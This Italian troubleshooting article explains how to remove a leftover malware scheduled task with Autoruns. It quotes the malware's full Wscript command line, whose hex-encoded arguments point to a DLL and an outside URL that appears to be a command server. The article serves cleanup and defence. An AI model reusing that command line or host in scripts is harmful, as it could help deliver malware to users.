Errore "Impossibile trovare il file di script" nella cartella C: \ ProgramData

Quando accedi al tuo computer, il seguente errore o simile potrebbe apparire ogni volta.

Impossibile trovare il file di script C: \ ProgramData \ {793391F4-29B5-4072-9833-30F048B1E37E} \ 1.9.3.1 \ rolo.txt

Questa voce è stata aggiunta da un malware, in cui la stringa {GUID} e i nomi dei file di script sono casuali e variano a seconda del sistema. A seguito della rimozione del malware, l'errore sopra riportato appare quando si accede al proprio account utente. Questo perché esiste ancora la voce Avvio o Attività pianificata, che punta al file mancante.

Esistono molti modi per identificare l'attività offensiva e rimuoverla. Uno dei modi più semplici è utilizzare Autoruns.

Autoruns è uno strumento avanzato di gestione dell'avvio di Microsoft, che è trattato in dettaglio nell'articolo Clean Boot Windows utilizzando l'utilità Autoruns. Potresti dare un'occhiata a quell'articolo prima di procedere.

Scarica Autoruns ed eseguilo. Fare clic sulla scheda Attività pianificate e guardare le voci evidenziate in giallo (che indica il file mancante).

Guarda la colonna Percorso immagine e identifica la voce che desideri rimuovere. Identificare la voce dovrebbe essere un compito abbastanza semplice; tutto quello che devi fare è annotare il nome del file e il percorso mostrato nel messaggio di errore e trovare la voce (evidenziata) corrispondente in Autoruns.

Facoltativamente, per raccogliere ulteriori dettagli sulla voce, fai clic sulla voce e osserva la sezione dei dettagli in basso, che mostra la riga di comando completa o la serie completa di argomenti utilizzati da quella voce.

In questo caso, la riga di comando completa è:

$config[ads_text6] not found
 "Wscript.exe" "C: \ ProgramData \ {793791F4-29B5-4072-9833-30F048B1E37E} \ 1.9.3.1 \ rolo.txt" "433a2f50726f6772616d446174612f7b37393337393146342d323942352d343037322d393833332d3330463034384231453337457d2f312e392e332e312f726f74692e646c6c" "687474703a2f2f73616f2e7265716472652e636f6d2f" "--IsErIk" "// E: jscript" 

Qualsiasi nome di file o percorso troppo lungo e con alcuni nomi oscuri viene probabilmente aggiunto dal malware. Tuttavia, potrebbero esserci delle eccezioni a cui devi fare attenzione.

Dopo aver eliminato la voce, non si dovrebbe più ricevere il messaggio di errore di script che fa riferimento a "ProgramData" all'avvio.

Articoli Correlati